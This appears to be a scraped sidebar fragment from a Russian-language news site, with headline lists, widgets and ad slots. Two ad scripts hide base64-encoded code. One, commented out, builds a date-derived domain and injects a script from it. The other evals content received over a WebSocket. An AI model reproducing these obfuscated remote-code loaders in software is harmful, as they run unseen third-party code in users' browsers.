class="view"><span><i></i>1966</span></td><td class="view last"><span><i></i>1536</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/803-xuzhe-ne-budet-v-seti-poyavilas-metkaya-fotozhaba-na-temu-poiska-ministrov-na-vakantnye-dolzhnosti" rel="bookmark">Хуже не будет: в Сети появилась меткая фотожаба на тему поиска министров на вакантные должности</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/603-samye-strannye-postupki-kotorye-sovershayut-xozyaeva-kotov-foto" rel="bookmark">Топ-10 самых курьезных фото домашних любимцев-котов (ФОТО)</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/403-polzovatelej-seti-porazila-koshka-ukravshaya-i-vykormivshaya-shhenkov-video" rel="bookmark">Пользователей Сети поразила кошка, укравшая щенков (ВИДЕО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/303-sobaka-ulybaka-milyj-shhenok-stal-zvezdoj-seti" rel="bookmark">«Собака–улыбака»: потерявшийся щенок стал звездой Сети</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/1002-vy-eto-chitali-nad-nishhenskimi-socialnymi-nadbavkami-dlya-lgotnikov-v-rossii-smeyutsya-dazhe-na-vgtrk-video" rel="bookmark">Ведущая программы новостей на росТВ не смогла удержаться от смеха над нищенскими «социальными надбавками» (ВИДЕО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/802-skrepy-v-set-vylozhili-video-repeticii-tanza-na-batute-v-rf" rel="bookmark">"Дно и скрепы": В сеть выложили видео репетиции танца на батуте ко дню Победы в РФ</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/702-set-porazil-kojot-kotoryj-pomog-barsuku-perejti-dorogu-video" rel="bookmark">Неожиданная дружба: Сеть поразил койот, который помог барсуку перейти дорогу (ВИДЕО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/702-kuryoz-u-zhitelej-mnogoetazhki-iz-kranov-vmesto-vody-nachal-tech-alkogol" rel="bookmark">В Индии у жителей многоэтажки из кранов вместо воды начал течь алкоголь</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div id="WHwvwcq55RuJtgZm5orj" data-type="0" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'hvnwoeo.pro';</script><script src="//hvnwoeo.pro/eXu/EjSt.js" ></script><br><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости культуры</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '30432,167', 30432, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '30432,167', 30432, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '30432,167', 30432, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news-culture/full/1503-novaya-karikatura-sergeya-elkina-pro-putina-stala-xitom-seti">Новая карикатура Сергея Елкина про Путина стала хитом сети (5989)</a></h3><h3 class="press"><a href="https://enovosty.com/news-culture/full/1603-kogda-koronavirus-vdoxnovlyaet-na-iskusstvo-v-kieve-poyavilsya-novyj-mural-na-aktualnuyu-temu-foto">Когда коронавирус вдохновляет: в Киеве появился новый мурал на актуальную тему (ФОТО) (1998)</a></h3><h3 class="press"><a href="https://enovosty.com/news-culture/full/1803-foto-dnya-vosxod-solnca-sfotografirovannyj-dronom-nad-zamkom-lids">Фото дня: Восход солнца, сфотографированный дроном, над замком Лидс (1448)</a></h3><h3 class="press"><a href="https://enovosty.com/news-culture/full/1803-provodit-vremya-s-polzoj-arnold-shvarcenegger-pokazal-kak-pravilno-myt-ruki-video">Проводит время с пользой: Арнольд Шварценеггер показал, как правильно мыть руки (ВИДЕО) (828)</a></h3><h3 class="press"><a href="https://enovosty.com/news-culture/full/1703-mozg-vzryvaetsya-dzhared-leto-12-dnej-meditiroval-v-pustyne-i-nichego-ne-znal-pro-pandemiyu-koronavirusa">«Мозг взрывается»: Джаред Лето 12 дней медитировал в пустыне и ничего не знал про пандемию коронавируса (413)</a></h3><h3 class="press"><a href="https://enovosty.com/news-culture/full/1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set">Без паники: Смешная и оптимистичная песня про ситуацию в коронавирусном мире "взорвала" сеть (214)</a></h3></div> </div><script>jQuery(document).ready(function($){function region(){html = $('#lastafishasingle .anythingWindow .activePage .region').html();$('#lastafishasingle .head span').html(html);}$('#sliderafishasingle').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><style>#sliderafishasingle .tact li{float:left;width:220px;line-height:8px}#lastafishasingle div.anythingSlider-minimalist-round{margin:auto}#lastafishasingle .postafisha{width:224px}#lastafishasingle h2{text-align:left;padding:10px 32px 10px 35px}#lastafishasingle .title a{display:block;font-size:13px;font-weight:700;text-align:left}#lastafishasingle{margin-bottom:10px;padding:0}#lastafishasingle .title{padding:5px 35px 5px 25px}#lastafishasingle.slide div.anythingSlider-minimalist-round .back,#lastafishasingle.slide div.anythingSlider-minimalist-round .forward{width:40px;height:132px;opacity:1;background-color:transparent}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("img/slider-arrows1.png") no-repeat;width:20px;height:45px;margin-top:54px;margin-left:10px}#lastafishasingle{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha5.png") repeat;border:1px solid #daa36b;-moz-background-size:100%; -webkit-background-size:100%; -o-background-size:100%; background-size:100%}#lastafishasingle .anythingSlider{border-bottom:1px solid #a99168}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha_arrows3.png") no-repeat}#lastafishasingle.slide div.anythingSlider-minimalist-round .forward a{background-position:right 0;margin-left:18px}#lastafishasingle .allafisha{display:block;text-align:right;font-size:14px;font-weight:bold;margin:0;padding:6px 10px 6px}#lastafishasingle .postafisha{position:relative}#lastafishasingle h2 span{float:right;font-size:11px;line-height:18px}#lastafishasingle .region{font-size:13px;text-align:left;padding:0 25px 5px}#lastafishasingle.slide.ssingle h2{padding:10px 17px 3px 40px;font-size:17px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .back,#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward{width:27px;right:-5px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .arrow a{margin-left:0px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward a{margin-left:7px}#lastafishasingle.slide.ssingle .postafisha{width:220px;text-align:right}#lastafishasingle.slide.ssingle .postafisha .aimg{text-align:center;overflow:visible}#lastafishasingle.slide.ssingle .postafisha .aimg img{overflow:visible;box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-moz-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-webkit-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-ms-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-o-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-khtml-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5)}</style><div id="lastafishasingle" class="slide ssingle"><p class="head">Афиша</p><ul id="sliderafishasingle"><li><ul class="tact"><li><ul class="tact"><li ><div id="post-4797909" class="postafisha"><span class="region">Киев 26&#160;марта</span><div class="aimg"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-veryu-v-lyubov"><img width="170" height="132" alt="Кинопремьера: фильм «Верю в любовь»" src="/wp-content/uploads/2020/03/viru_v.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-veryu-v-lyubov">Кинопремьера: фильм «Верю в любовь»</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4797920" class="postafisha"><span class="region">Киев 26&#160;марта</span><div class="aimg"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-v-chornij-chornij-kimnati"><img width="170" height="132" alt="Кинопремьера: фильм «В Чорній, Чорній ..." src="/wp-content/uploads/2020/03/komnata.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-v-chornij-chornij-kimnati">Кинопремьера: фильм «В Чорній, Чорній ...</a></div></div></li></ul></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4348144"><a href="https://enovosty.com/armiya/full/225-zenitnyj-raketnyj-kompleks-osa-ak" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/04/ZRK_Osa-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/04/ZRK_Osa-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/04/ZRK_Osa-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/04/ZRK_Osa.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/225-zenitnyj-raketnyj-kompleks-osa-ak" >Зенитный ракетный комплекс «Оса-АК»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4408254"><a href="https://enovosty.com/armiya/full/864-granatomet-carl-gustaf-shveciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/11/karl_gustav-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/11/karl_gustav-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/11/karl_gustav-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/11/karl_gustav.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/864-granatomet-carl-gustaf-shveciya" >Гранатомет Carl Gustaf (Швеция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4499034"><a href="https://enovosty.com/armiya/full/683-bronetransporter-btr-3da" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2016/01/btr3da-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2016/01/btr3da-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2016/01/btr3da-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2016/01/btr3da.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/683-bronetransporter-btr-3da" >Бронетранспортер БТР-3ДА</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4503770"><a href="https://enovosty.com/armiya/full/748-boevoj-modul-iva" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2016/02/iva-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2016/02/iva-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2016/02/iva-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2016/02/iva.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/748-boevoj-modul-iva" >Боевой модуль «Ива»</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4301910"><a href="https://enovosty.com/person/full/ognevich-zlata" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/06/zlata-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/06/zlata-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/06/zlata.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/ognevich-zlata" >Злата<br /> ОГНЕВИЧ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4321015"><a href="https://enovosty.com/person/full/728-parchaladze-lev" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/10/parchaladze_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/10/parchaladze_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/10/parchaladze_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/728-parchaladze-lev" >Лев<br /> ПАРЦХАЛАДЗЕ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4435594"><a href="https://enovosty.com/person/full/235-lysenko-andrej" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/03/lysenko-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/03/lysenko-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/03/lysenko.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/235-lysenko-andrej" >Андрей<br /> ЛЫСЕНКО</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4767882"><a href="https://enovosty.com/person/full/508-yurij-golik" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2019/08/golik-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/08/golik-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2019/08/golik.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/508-yurij-golik" >Голик<br /> ЮРИЙ</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_society/full/1803-rossmi-vydali-perl-o-zakrytii-lvovskogo-metro-i-poluchili-otvet-ot-prituly">РосСМИ выдали "перл" о закрытии львовского метро и получили ответ от Притулы (6083)</a></p><p class="press"><a href="https://enovosty.com/zdorove/full/1803-moz-ukrainy-ozvuchil-oficialnuyu-statistiku-po-zabolevaemosti-covid-19-v-ukraine-video">МОЗ Украины озвучил официальную статистику по заболеваемости COVID-19 в Украине (ВИДЕО) (4374)</a></p><p class="press"><a href="https://enovosty.com/news_kiev/full/1803-v-kieve-razreshili-poka-chto-ne-platit-za-internet">В Киеве разрешили пока что не платить за интернет (3625)</a></p><p class="press"><a href="https://enovosty.com/uk/news-auto-ukr/full/1903-v-dubai-znajshli-10-novix-ford-excursion-yaki-prostoyali-v-garazhi-15-rokiv-foto">В Дубаї знайшли 10 нових Ford Excursion, які простояли в гаражі 15 років (ФОТО) (3039)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/1903-v-ukraine-mozhet-podeshevet-stoimost-ustanovki-gbo">В Украине может подешеветь стоимость установки ГБО (2423)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1803-pochemu-putin-na-samom-dele-tak-toropitsya-s-konstituciej-portnikov">Почему Путин на самом деле так торопится с конституцией, - Портников (2145)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1803-v-rossii-obvalilisya-kurs-rublya">В России обвалилися курс рубля (2080)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1903-yolkin-miloj-karikaturoj-pokazal-kak-stoit-borotsya-s-panikoj">Ёлкин милой карикатурой показал, как стоит бороться с паникой (1859)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1803-beda-na-neftyanom-rynke-evropy-prishla-k-rossijskim-neftyanikam-ne-odna-anti-colorados">Беда на нефтяном рынке Европы пришла к российским нефтяникам не одна, - Аnti-colorados (1764)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1803-ne-koronavirusom-edinym-koty-zasnuvshie-v-samyx-nepodxodyashhix-mestax-foto">Не коронавирусом единым: коты, заснувшие в самых неподходящих местах (ФОТО) (1671)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/1002-sluga-novikov-pomogaet-kvazaru-kinut-bank-na-100-mln-griven">"Слуга" Новиков помогает "КВАЗАРУ" "кинуть" банк на 100 млн гривен</a></p><p class="press"><a href="https://enovosty.com/publications/full/2401-koncessiya-xersonskogo-porta-kakie-riski-neset-pobeda-risoil">Концессия Херсонского порта: какие риски несет "победа" Risoil</a></p></div><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/1603-tochnoe-chislo-zarazhennyx-vakcina-i-karantin-chto-vazhno-znat-o-koronaviruse" title="Точное число зараженных, вакцина и карантин: Что важно знать о коронавирусе" > <img width="300" height="191" src="https://enovosty.com/wp-content/uploads/2020/03/8.-6-370x236.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2020/03/8.-6-370x236.jpg 370w, https://enovosty.com/wp-content/uploads/2020/03/8.-6-370x236-112x71.jpg 112w, https://enovosty.com/wp-content/uploads/2020/03/8.-6-370x236-300x191.jpg 300w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/1603-tochnoe-chislo-zarazhennyx-vakcina-i-karantin-chto-vazhno-znat-o-koronaviruse" style="line-height: 1.1;" rel="bookmark" title="Точное число зараженных, вакцина и карантин: Что важно знать о коронавирусе">Точное число зараженных, вакцина и карантин: Что важно знать о коронавирусе</a></p></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/zdorove/full/1303-milliony-lyudej-kotorye-okazalis-zaperty-v-kitae-iz-za-koronavirusa-otkryli-dlya-sebya-radost-kulinarii">Миллионы людей, которые оказались заперты в Китае из-за коронавируса, открыли для себя радость кулинарии (25875)</a></p><p class="press"><a href="https://enovosty.com/zdorove/full/1803-shveciya-otkazalas-ot-borby-s-koronavirusom-etot-virus-ne-ugrozhaet-lyudyam">Швеция отказалась от борьбы с коронавирусом: “Этот вирус не угрожает людям!” (15324)</a></p><p class="press"><a href="https://enovosty.com/news-markets/full/1303-xtz-yaroslavskogo-moderniziruet-proizvodstvo-i-uvelichivaet-obemy-vypuska-traktorov">ХТЗ Ярославского модернизирует производство и увеличивает объемы выпуска тракторов (15153)</a></p></div></div></div><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"><div id="cityLink"><a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"><img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"></a></div><div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" 